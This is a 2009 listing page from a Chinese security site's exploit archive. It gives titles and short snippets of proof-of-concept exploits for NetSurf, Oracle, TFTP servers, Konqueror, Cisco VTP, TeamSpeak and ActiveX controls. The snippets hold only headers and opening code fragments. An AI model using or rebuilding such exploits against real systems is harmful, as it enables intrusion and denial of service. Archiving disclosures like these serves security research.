首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
The Cisco IOS HTTP server is vulnerable to cross site scripting within invalid p
  日期:2009-01-15 11:32:49 点击:95 评论:0
PR08-19: XSS on Cisco IOS HTTP ServerDate found: 1st August 2008Vendor contacted: 1st August 2008Advisory publicly released: 14th January 2009Severity: MediumCredits: Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)Description:Cisco IOS HTTP ser
NetSurf version 1.2 hspace remote integer overflow proof of concept exploit
  日期:2009-01-15 11:32:00 点击:35 评论:0
#!/usr/bin/perl# netsurf_hspace_intof1.pl# Netsurf 1.2 'hspace' Remote Integer Overflow PoC Exploit# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]# # [ltrace log -- hspace = 30000, without --sync]# # gdk_gc_set_clip_rectangle(0x8cbdaf8,
NetSurf version 1.2 width remote integer overflow proof of concept exploit
  日期:2009-01-15 11:31:34 点击:31 评论:0
#!/usr/bin/perl# netsurf_width_intof2.pl# Netsurf 1.2 'width' Remote Integer Overflow PoC Exploit# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]# # Program received signal SIGABRT, Aborted.# [Switching to Thread 0xb6d78720 (LWP 28933)]#
NetSurf version 1.2 remote memory leak exploit
  日期:2009-01-15 11:30:29 点击:26 评论:0
#!/usr/bin/perl# netsurf_imgsrc_ml.pl# Netsurf 1.2 Remote Memory Leak Exploit# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]# Adv Ref: netsurf_multiple_adv.txt$filename = $ARGV[0];if(!defined($filename)){ print Usage: $0 filename.htmln
Oracle TimesTen Remote Format String PoC
  日期:2009-01-15 11:27:07 点击:36 评论:0
#!/usr/bin/python Oracle TimesTen Remote Format String (Fixed in Oracle CPU Jan 2009 Copyright (c) Joxean Koret 2009 import sys import socket def testPoc(host): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, 17000)) buf = GET
Oracle Secure Backup 10g exec_qr() Command Injection Vulnerability
  日期:2009-01-15 11:25:36 点击:50 评论:0
Oracle Secure Backup 10g Remote Code Execution ============================================== Product Description =================== Oracle Secure Backup is a centralized tape backup management software providing secure data protection for heterogen
phosheezy 2.0 Remote Command Execution Exploit
  日期:2009-01-15 11:23:32 点击:29 评论:0
#!/usr/bin/perl # phosheezy 2.0 # http://www.ryneezy.net/apps/phosheezy/phosheezy-v0.2.tar.gz # Remote Command Execution Exploit # by Osirys # osirys[at]live[dot]it # osirys.org # Greets: HaVoC, x0r, jay, BlackLight # lol at athos # -----------------
AAA EasyGrid ActiveX 3.51 Remote File Overwrite Exploit
  日期:2009-01-15 11:22:56 点击:49 评论:0
=======================================================================================br Author: Houssamix br =======================================================================================br - Viva Gazza - Viva Palestine - br AAA EasyGrid A
Exploits 3CTftpSvc Server 2.0.1 Long Requesat Buffer Overflow (metasploit)
  日期:2009-01-14 17:57:56 点击:78 评论:0
require 'msf/core'module Msfclass Exploits::Windows::Tftp::ThreeCeeTftpSvc_Overflow Msf::Exploit::Remote include Exploit::Remote::Udp def initialize(info = {}) super(update_info(info, 'Name' = '3CTftpSvc Server 2.0.1 Long Requesat Buffer Overflow',
AT-TFTP Buffer Overflow (Long filename) Vulnerability Exploit
  日期:2009-01-14 17:57:11 点击:22 评论:0
#!/usr/bin/python# Buffer Overflow (Long filename) Vulnerability Exploit# This is just a DoS exploiting code# Tested on Windows xp SP2## Requires python and impacket## Coded by Liu Qixu Of NCNIPCimport socketimport syshost = '192.168.1.11'port = 69t
3CTftpSvc transport mode name buffer overflowexploit
  日期:2009-01-14 17:56:41 点击:89 评论:0
#!/usr/bin/perl # 3com_tftp_bof.pl # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # Easily owns ancient 3CTftpSvc.zip # JOKE!@#$% OK!@#$% JOKE!@#$% # Now how about a time machine and axx to 3com internal networks! # /JOKE!@#$% OK!@#$%
3ctftpsvc Buffer Overflow (Long transporting mode) Vulnerability Exploit
  日期:2009-01-14 17:54:54 点击:27 评论:0
#!/usr/bin/python# Buffer Overflow (Long transporting mode) Vulnerability Exploit# This is just a DoS exploiting code# Tested on Windows xp SP2## Requires python and impacket## Coded by Liu Qixu Of NCNIPCimport socketimport syshost = '192.168.1.11'p
KDE Konqueror 4.1.3 'iframe src' Memory Leak Exploit
  日期:2009-01-14 17:54:01 点击:65 评论:0
#!/usr/bin/perl # konq_ifsrc_ml.pl # KDE Konqueror 4.1.3 'iframe src' Memory Leak Exploit # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # # Program received signal SIGSEGV, Segmentation fault. # [Switching to Thread 0xb60008d0 (LWP 14
KDE Konqueror 4.1.3 'link href' Memory Leak Exploit
  日期:2009-01-14 17:53:14 点击:17 评论:0
#!/usr/bin/perl # konq_lhref_ml.pl # KDE Konqueror 4.1.3 'link href' Memory Leak Exploit # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # # Software should be able to handle any kind of input and still perform correct operations. # Web
Cisco VLAN Trunking Protocol Denial of Service Exploit
  日期:2009-01-14 17:51:25 点击:36 评论:0
/*DoS code for Cisco VLAN Trunking Protocol Vulnerability * *vulerability discription: *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml * *To Known: * 1.the switch must in Server/Client Mode. * 2.the port ,attacker connected,must be
EDraw Office Viewer 5.4 HttpDownloadFile() Insecure Method Vuln
  日期:2009-01-14 14:47:05 点击:26 评论:0
Edraw Office Viewer Component v5.4 HttpDownloadFile() Insecure Method Founded By : Cyber-Zone E-mail : Paradis_des_fous@hotmail.fr Home : WwW.Exploiter5.CoM GreetZ : Houssamix , Hussin X , JiKo , StaCk , str0ke , The_5p3ctrum , BayHay , All Mgharba W
TeamSpeak <= 2.0.23.17 Remote File Disclosure Vulnerability
  日期:2009-01-14 14:46:21 点击:80 评论:0
?php // teamspeak server = 2.0.23.17 remote read file vulnerability // bug found and exploit write by c411k // http://www.heise-online.co.uk/security/Vulnerability-in-TeamSpeak-2-server--/news/93734 zazhali ploent svolo4i!! // tested on win ts2_serve
Denial of service exploit that leverages the Cisco VLAN trunking protocol vulner
  日期:2009-01-14 11:17:26 点击:36 评论:0
/*DoS code for Cisco VLAN Trunking Protocol Vulnerability * *vulerability discription: *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml * *To Known: * 1.the switch must in Server/Client Mode. * 2.the port ,attacker connected,must be
Ciansoft PDFBuilderX version 2.2 arbitrary file overwrite exploit
  日期:2009-01-14 09:55:53 点击:48 评论:0
Alfons Luja ========================================================================================================================b Ciansoft PDFBuilderX 2.2 Arbitrary File Overwrite br/ p0c br/ Alfons Luja br/ Pozdrowienia dla odFiecznych fanf br/
Word Viewer OCX 3.2 Remote File Execution exploit
  日期:2009-01-14 09:54:08 点击:17 评论:0
HTML ---------------------------------------------------------- br Word viewer OCX V 3.2 Remote File execution exploitbr ---------------------------------------------------------- br -----------------------------------br # By Mountassif Moad a.k.a St
共637页/12733条记录 首页 上一页 [484] [485] [486] 487 [488] [489] [490] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved